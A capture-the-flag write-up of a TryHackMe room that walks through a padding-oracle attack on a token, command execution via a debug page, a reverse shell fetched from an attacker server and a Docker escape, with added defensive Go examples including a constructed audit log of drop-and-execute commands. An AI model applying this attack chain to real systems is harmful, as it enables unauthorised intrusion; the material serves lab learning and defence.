New York Flankees (TryHackMe) writeup
By NF
- Difficulty: Medium
- Platform: Linux
Objectives:
Flag 1: What is the cleartext value of the decrypted blob (the format is element1:element2)?
Flag 2: What is the flag in the admin panel?
Flag 3: Dig around in the container. What is the second flag?
Flag 4: What is the final flag?
Reconnaissance (recon) is the first phase of a penetration test.
Use Nmap: nmap -sV -Pn {target-IP}
Let's open port 8080 in the web browser: http://{target-IP}:8080/
On this website there is an additional section that links to some pages:
- /login.html
- /index.html
- /debug.html
I went to the “Stefan Test” page and noticed something unusual.
Open the browser's Inspector on this page; I found abnormal JavaScript code there.
Use the URL found in that script, substituting our machine's IP address and appending the token from the URL.
Edit a few characters of the token: the response becomes "Decryption error".
Searching for this verbose (padding) error to see if it was useful, I found a HackTricks entry for padre, a tool that exploits it:
padre is an advanced exploiter for Padding Oracle attacks against CBC mode encryption
https://github.com/glebarez/padre
After installation, you can list the options with ./padre -h.
After running the command, I found the username and password as well as the answer to the first question.
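The "Decryption error" message is the whole vulnerability: the server decrypts the token without authenticating it and tells the client whether the PKCS#7 padding checked out, and that yes/no answer is what padre drives. The Go program below is an added example, not code from the room or from padre, that puts the leaky pattern beside its fix (encrypt-then-MAC with one generic error, checked before any decryption). The keys, the fixed IV and the alice:s3cret plaintext are constructed for the demo.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha256"
	"errors"
	"fmt"
)

// Constructed demo keys. A real service derives them with a KDF and never embeds them.
var (
	encKey = []byte("0123456789abcdef0123456789abcdef") // 32 bytes: AES-256
	macKey = []byte("fedcba9876543210fedcba9876543210")
)

var (
	ErrBadPadding = errors.New("decryption error: bad padding") // the verbose leak
	ErrInvalid    = errors.New("invalid token")                  // the single hardened error
)

const bs = aes.BlockSize // 16

func pkcs7Pad(b []byte) []byte {
	n := bs - len(b)%bs
	return append(b, bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs7Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 || len(b)%bs != 0 {
		return nil, ErrBadPadding
	}
	n := int(b[len(b)-1])
	if n == 0 || n > bs {
		return nil, ErrBadPadding
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, ErrBadPadding
		}
	}
	return b[:len(b)-n], nil
}

// cbcEncrypt returns iv||ciphertext. The caller passes the IV so the example is
// reproducible; production code draws a fresh IV from crypto/rand per message.
func cbcEncrypt(iv, pt []byte) []byte {
	block, _ := aes.NewCipher(encKey)
	padded := pkcs7Pad(append([]byte{}, pt...))
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return append(append([]byte{}, iv...), ct...)
}

func cbcDecryptRaw(blob []byte) []byte {
	block, _ := aes.NewCipher(encKey)
	pt := make([]byte, len(blob)-bs)
	cipher.NewCBCDecrypter(block, blob[:bs]).CryptBlocks(pt, blob[bs:])
	return pt
}

// LeakyDecrypt is the vulnerable pattern: unauthenticated CBC plus a distinct
// padding error. Whether it fails depends on the decrypted bytes, so every
// response to a modified token leaks one bit about the plaintext.
func LeakyDecrypt(blob []byte) ([]byte, error) {
	if len(blob) < 2*bs || len(blob)%bs != 0 {
		return nil, ErrBadPadding
	}
	return pkcs7Unpad(cbcDecryptRaw(blob))
}

// Seal is the hardened pattern (encrypt-then-MAC): iv||ct||HMAC-SHA256(iv||ct).
func Seal(iv, pt []byte) []byte {
	body := cbcEncrypt(iv, pt)
	m := hmac.New(sha256.New, macKey)
	m.Write(body)
	return m.Sum(body)
}

// Open checks the tag in constant time before touching the ciphertext, so any
// modification is rejected with one error and padding state is never observable.
func Open(blob []byte) ([]byte, error) {
	if len(blob) < 2*bs+sha256.Size {
		return nil, ErrInvalid
	}
	body, tag := blob[:len(blob)-sha256.Size], blob[len(blob)-sha256.Size:]
	m := hmac.New(sha256.New, macKey)
	m.Write(body)
	if !hmac.Equal(tag, m.Sum(nil)) {
		return nil, ErrInvalid
	}
	pt, err := pkcs7Unpad(cbcDecryptRaw(body))
	if err != nil {
		return nil, ErrInvalid // cannot happen for authentic data; still never leak it
	}
	return pt, nil
}

// TamperByte returns a copy of blob with one byte XORed by mask.
func TamperByte(blob []byte, idx int, mask byte) []byte {
	out := append([]byte{}, blob...)
	out[idx] ^= mask
	return out
}

func main() {
	iv := []byte("constructed-iv16")          // constructed, exactly 16 bytes
	blob := Seal(iv, []byte("alice:s3cret")) // constructed element1:element2 value
	raw := blob[:2*bs]                       // iv||ct without the tag
	a := TamperByte(raw, bs-1, 0x04^0x01)    // last plaintext byte 0x04 -> 0x01: valid padding
	b := TamperByte(raw, bs-1, 0x01)         // last plaintext byte 0x04 -> 0x05: invalid padding
	_, errA := LeakyDecrypt(a)
	_, errB := LeakyDecrypt(b)
	fmt.Println("leaky:   ", errA, "|", errB) // two different answers: an oracle
	_, errA = Open(TamperByte(blob, bs-1, 0x04^0x01))
	_, errB = Open(TamperByte(blob, bs-1, 0x01))
	fmt.Println("hardened:", errA, "|", errB) // the same answer both times
}
```

The two tampered tokens differ only in how the last byte of the IV is flipped, yet the leaky path accepts one and rejects the other, which is exactly the distinction a padding-oracle tool collects. The hardened path answers both identically because the HMAC fails before the padding is ever examined; an AEAD mode such as AES-GCM gives the same property with less code.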
Log in with them.
After logging in, you will see a “Debug” button appear in the top-right corner.
On the debug page, we found our first flag.
This page lets us run commands on the machine. Test it with a harmless command first.
Use curl to test the connection back to our server.
Great, we received a 200 response.
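A debug page that runs whatever command it is given is a command-injection sink by design. As an added example (not the room's code), the Go program below contrasts the pattern behind such a page, handing the request string to sh -c, with an allowlisted version that builds an argv directly, validates the single argument it accepts and never involves a shell. The diagnostic names, the hostname regex and the command templates are assumptions made for the demonstration.

```go
package main

import (
	"errors"
	"fmt"
	"os/exec"
	"regexp"
)

var ErrNotAllowed = errors.New("command not allowed")

// RunDebugUnsafe is the pattern behind a debug page that lets a user "use commands
// on the machine": the request goes straight to a shell, so every metacharacter
// in it (;, |, $(), backticks) is honoured. Shown for contrast only.
func RunDebugUnsafe(input string) ([]byte, error) {
	return exec.Command("sh", "-c", input).CombinedOutput()
}

// hostRe bounds the one argument the allowed diagnostics accept: a hostname or
// IP literal with no spaces and no shell metacharacters (assumed policy).
var hostRe = regexp.MustCompile(`^[A-Za-z0-9.-]{1,253}$`)

// allowed maps a diagnostic name to a fixed argv template; "%s" marks where the
// validated argument goes. Anything not listed here is refused.
var allowed = map[string][]string{
	"ping":    {"ping", "-c", "1", "%s"},
	"resolve": {"getent", "hosts", "%s"},
	"uptime":  {"uptime"},
}

// BuildArgv turns (name, arg) into an argv slice or refuses it. Because no shell
// is involved, "host; id" is rejected by the regex rather than executed.
func BuildArgv(name, arg string) ([]string, error) {
	tmpl, ok := allowed[name]
	if !ok {
		return nil, ErrNotAllowed
	}
	argv := make([]string, 0, len(tmpl))
	needsArg := false
	for _, part := range tmpl {
		if part == "%s" {
			needsArg = true
			if !hostRe.MatchString(arg) {
				return nil, fmt.Errorf("%w: bad argument %q", ErrNotAllowed, arg)
			}
			argv = append(argv, arg)
			continue
		}
		argv = append(argv, part)
	}
	if !needsArg && arg != "" {
		return nil, fmt.Errorf("%w: %s takes no argument", ErrNotAllowed, name)
	}
	return argv, nil
}

// RunDebugSafe executes an allowlisted diagnostic with exec.Command(argv[0], argv[1:]...),
// which passes the arguments to the program directly, without shell interpretation.
func RunDebugSafe(name, arg string) ([]byte, error) {
	argv, err := BuildArgv(name, arg)
	if err != nil {
		return nil, err
	}
	return exec.Command(argv[0], argv[1:]...).CombinedOutput()
}

func main() {
	// Constructed inputs: one legitimate, one with an injected second command,
	// one asking for a program that is not on the allowlist.
	for _, in := range [][2]string{{"ping", "example.com"}, {"ping", "example.com; whoami"}, {"id", ""}} {
		argv, err := BuildArgv(in[0], in[1])
		fmt.Printf("%-24q -> argv=%v err=%v\n", in[0]+" "+in[1], argv, err)
	}
}
```

The hardened version changes the interface: the client chooses a diagnostic by name and supplies one constrained value, instead of supplying a command line. If a debug page like this must exist at all, it should also sit behind authentication and be absent from production builds.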
It's time to try a reverse shell.
Use a reverse shell generator to create shell.sh.
Open a listener to receive the incoming connection.
First, transfer shell.sh to the server.
Our HTTP server received the request, which means shell.sh was fetched onto the target.
Give the script executable permissions.
Use bash to execute it.
We have received the shell.
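From the defender's side, the steps just described (fetch a script from an external HTTP server, chmod +x, run it with bash) form a recognisable chain in any log of the commands the debug endpoint executed. The Go program below is an added example, not part of the write-up, that detects that chain, plus the one-line variant of piping a download straight into a shell, over a constructed audit log. The log lines, the 10.0.0.5 address and the file paths are made up for the demo.

```go
package main

import (
	"fmt"
	"path"
	"regexp"
	"strings"
)

// SampleAudit is a constructed log of commands a debug endpoint executed, one per
// line, in the form a process audit trail would record them. Not taken from the page.
const SampleAudit = `whoami
curl http://10.0.0.5/index.html
curl http://10.0.0.5/shell.sh -o /tmp/shell.sh
chmod +x /tmp/shell.sh
bash /tmp/shell.sh
ls -la`

var (
	fetchRe  = regexp.MustCompile(`^(?:curl|wget)\b.*?(https?://\S+)`)
	outputRe = regexp.MustCompile(`\s-[oO]\s*(\S+)`)
	chmodRe  = regexp.MustCompile(`^chmod\s+(?:\+x|u\+x|a\+x|[0-7]*[1357][0-7]*)\s+(\S+)`)
	execRe   = regexp.MustCompile(`^(?:bash|sh|\.)\s+(\S+)`)
	pipeRe   = regexp.MustCompile(`^(?:curl|wget)\b.*\|\s*(?:bash|sh)\b`)
)

// Finding records one drop-and-execute chain: the file involved and the lines
// that formed the chain, in order.
type Finding struct {
	Path  string
	Lines []string
}

// DetectDropAndExec looks for the three-step pattern (fetch a file over HTTP,
// make it executable, run it with a shell) and for the single-line variant of
// piping a download into a shell. It returns one Finding per completed chain.
func DetectDropAndExec(audit string) []Finding {
	fetched := map[string]string{}  // candidate path -> line that fetched it
	staged := map[string][]string{} // path -> fetch and chmod lines
	var findings []Finding
	for _, line := range strings.Split(audit, "\n") {
		line = strings.TrimSpace(line)
		switch {
		case pipeRe.MatchString(line):
			findings = append(findings, Finding{Path: "(stdin)", Lines: []string{line}})
		case fetchRe.MatchString(line):
			url := fetchRe.FindStringSubmatch(line)[1]
			fetched[path.Base(url)] = line // default save name, e.g. wget without -O
			if m := outputRe.FindStringSubmatch(line); m != nil {
				fetched[m[1]] = line // explicit output path via -o / -O
			}
		case chmodRe.MatchString(line):
			p := chmodRe.FindStringSubmatch(line)[1]
			if fl, ok := fetched[p]; ok {
				staged[p] = []string{fl, line}
			}
		case execRe.MatchString(line):
			p := execRe.FindStringSubmatch(line)[1]
			if st, ok := staged[p]; ok {
				findings = append(findings, Finding{Path: p, Lines: append(st, line)})
				delete(staged, p)
			}
		}
	}
	return findings
}

func main() {
	for _, f := range DetectDropAndExec(SampleAudit) {
		fmt.Printf("ALERT drop-and-execute of %s:\n", f.Path)
		for _, l := range f.Lines {
			fmt.Println("   ", l)
		}
	}
}
```

Requiring all three steps on the same file keeps the rule quiet on ordinary curl usage (the index.html fetch in the sample produces nothing), while the pipe rule catches the shorter form that skips chmod entirely. In a real deployment the same logic would run over auditd execve records or container runtime logs rather than a string constant.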
The first thing we do after getting the shell is spawn a TTY.
While exploring, we found that we are inside a Docker container.
Use cd to move to the app directory inside the container. In the docker-compose.yml file we'll find the answer to our third question and our second flag.
I did a search and found a helpful HackTricks page for breaking out of a Docker environment.
Use this command to break out of the Docker shell.
Finally, now we have become one with the host.
Wowww, we found the final flag.
Thank you sincerely for taking the time to read and show interest in my write-up. I am very pleased that the effort and thought put into this work have garnered your attention. Your feedback and comments are important to me and help me improve both myself and the work I do. Thank you again for your support and interest.